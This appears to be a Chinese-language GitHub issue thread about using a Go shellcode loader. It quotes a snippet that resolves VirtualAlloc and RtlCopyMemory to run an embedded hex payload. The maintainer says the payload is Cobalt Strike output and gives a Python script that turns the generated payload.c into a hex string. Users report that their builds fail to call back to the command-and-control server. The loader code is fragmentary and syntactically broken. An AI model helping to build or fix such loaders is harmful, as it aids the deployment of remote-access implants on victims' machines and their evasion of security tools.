怎么用

[shincehor]

[binganao]

No description provided.

修改这串代码中的shellcode here为你的shellcode，然后使用命令go build构建exe文件

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	code          = "fc4883e4f0e8c..." //16进制字符串代码
	decode1       "shellcode here"
)

[mcblog]

No description provided.

修改这串代码中的shellcode here为你的shellcode，然后使用命令go build构建exe文件

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	code          = "fc4883e4f0e8c..." //16进制字符串代码
	decode1       "shellcode here"
)

有联系方式么

[binganao]

No description provided.

修改这串代码中的shellcode here为你的shellcode，然后使用命令go build构建exe文件

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	code          = "fc4883e4f0e8c..." //16进制字符串代码
	decode1       "shellcode here"
)

有联系方式么

抱歉我恐怕不能提供

[zi0n8]

build成exe了，但是并没有上线请问一下用的是cs生成的c语言shellcode还是其它什么shell code

[Mitnick0x]

build成exe了，但是并没有上线请问一下用的是cs生成的c语言shellcode还是其它什么shell code

那个shellcode里面格式是啥样的啊

[Hel10-Web]

那个shellcode里面格式是啥样的啊

[binganao]

那个shellcode里面格式是啥样的啊

是由 cs 生成的 payload.c，你可以用以下脚本生成shellcode

import re

str = ""
with open("payload.c","r") as f:
    while True:
        line = f.readline()
        if not line:
            break
        line = line.strip('\n')
        str += line
list1 = re.compile(r'\"(.*)\"').findall(str)
result = ''.join(list1).replace("\\x","")
print(result)

[Hel10-Web]

OK，感谢师傅

[binganao]

build成exe了，但是并没有上线请问一下用的是cs生成的c语言shellcode还是其它什么shell code

刚看到，留意一下我的回复

[TheTh1nk3r]

无法上线，运行就出来个黑框

[uiguh0708]

确实，只有黑框